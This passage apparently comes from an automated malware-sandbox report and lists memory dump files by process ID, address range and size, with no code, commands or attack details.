                                                                                                                                                                                                      • memory/5012-225-0x0000000005180000-0x0000000005181000-memory.dmp
                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                        4KB

                                                                                                                                                                                                      • memory/5012-200-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                      • memory/5012-462-0x0000000002DD0000-0x0000000002DD2000-memory.dmp
                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                        8KB

                                                                                                                                                                                                      • memory/5012-232-0x0000000002AD0000-0x0000000002ADC000-memory.dmp
                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                        48KB

                                                                                                                                                                                                      • memory/5012-235-0x0000000009BE0000-0x0000000009BE1000-memory.dmp
                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                        4KB

                                                                                                                                                                                                      • memory/5012-239-0x0000000005400000-0x0000000005401000-memory.dmp
                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                        4KB

                                                                                                                                                                                                      • memory/5012-249-0x0000000002B60000-0x0000000002B61000-memory.dmp
                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                        4KB

                                                                                                                                                                                                      • memory/5012-347-0x00000000001E0000-0x00000000001E1000-memory.dmp
                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                        4KB

                                                                                                                                                                                                      • memory/5020-294-0x00000000001E0000-0x00000000001E1000-memory.dmp
                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                        4KB

                                                                                                                                                                                                      • memory/5020-271-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                      • memory/5024-143-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                      • memory/5028-141-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                      • memory/5060-579-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                      • memory/5140-582-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                      • memory/5280-359-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                      • memory/5288-440-0x00000000001E0000-0x00000000001E1000-memory.dmp
                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                        4KB

                                                                                                                                                                                                      • memory/5288-421-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                      • memory/5476-669-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                      • memory/5548-448-0x0000000000B90000-0x0000000000BD3000-memory.dmp
                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                        268KB

                                                                                                                                                                                                      • memory/5548-445-0x0000000000B9D20B-mapping.dmp
                                                                                                                                                                                                      • memory/5552-378-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                      • memory/5568-379-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                      • memory/5568-454-0x00000000052C0000-0x00000000052C1000-memory.dmp
                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                        4KB

                                                                                                                                                                                                      • memory/5568-431-0x0000000077220000-0x00000000773AE000-memory.dmp
                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                        1.6MB

                                                                                                                                                                                                      • memory/5820-395-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                      • memory/5820-446-0x00000000053F0000-0x00000000053F1000-memory.dmp
                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                        4KB

                                                                                                                                                                                                      • memory/6012-407-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                      • memory/6012-413-0x0000000000400000-0x0000000000416000-memory.dmp
                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                        88KB

                                                                                                                                                                                                      • memory/6056-600-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                      • memory/6140-415-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                      • memory/6140-434-0x0000000002180000-0x0000000002182000-memory.dmp
                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                        8KB

                                                                                                                                                                                                      • memory/6184-602-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                      • memory/6340-610-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                      • memory/6596-623-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                      • memory/6632-624-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                      • memory/7028-641-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                      • memory/7152-650-0x0000000000000000-mapping.dmp